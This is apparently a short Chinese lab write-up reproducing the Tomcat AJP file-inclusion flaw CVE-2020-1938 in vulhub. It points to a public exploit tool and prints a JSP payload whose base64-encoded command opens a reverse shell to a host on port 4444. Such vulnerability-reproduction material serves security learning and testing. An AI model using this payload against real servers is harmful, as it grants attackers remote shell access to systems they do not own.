vulhub中Aapache Tomcat AJP 文件包含漏洞复现(CVE-2020-1938)

余生有个小酒馆2024-03-02 13:21

查看tomcat默认页面,此时通过AJP协议的8009端口亦可访问Tomcat。

利用如下工具均可测试漏洞:

工具需要用到python2,

如果需要进一步利用需要向服务器的/webapps/ROOT目录下上传恶意文件

复制代码 
<%Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzOS40My80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}");%>

利用工具https://github.com/00theway/Ghostcat-CNVD-2020-10487

进行执行上传的恶意文件

相关推荐
swordbob3 分钟前
缓存延迟双删的两种策略
java·缓存
凡人叶枫4 分钟前
Effective C++ 条款08:别让异常逃离析构函数
java·linux·数据库·c++·嵌入式开发
云烟成雨TD5 分钟前
Agent Scope Java 2.x 系列【4】模型层
java·人工智能·agent
云烟成雨TD16 分钟前
Agent Scope Java 2.x 系列【5】智能体抽象层
java·人工智能·agent
阿伟AI说20 分钟前
Codex 桌面版接入国产模型系列二:Codex++
java·开源软件·ai编程·腾讯云ai代码助手
love_muming41 分钟前
链表每日一练
java·开发语言·数据结构·链表·idea·每日一练
范什么特西44 分钟前
重点:mybatis注意细节
java·mysql·mybatis
乐观勇敢坚强的老彭1 小时前
GESP一级核心算法:循环与条件判断的结合
java·数据结构·算法
雪宫街道1 小时前
SpringBoot 向 IOC 容器注册组件的两种姿势:@Configuration 与 @Import
java·spring boot·后端·spring
李豆豆喵1 小时前
010-基础入门-数据加解密&演示环境&源码项目等
web安全
热门推荐
01HTTP 与 HTTPS 的区别:从原理到实战详解02《置身钉内》原文-可播放阅读03【AI】2026 年具身智能模型和世界模型总结042026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?05Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析06AI科技热点日报 | 2026年6月1日072026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?08GitHub 镜像站点09AI一周事件 · 2026-06-03 至 2026-06-09102026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf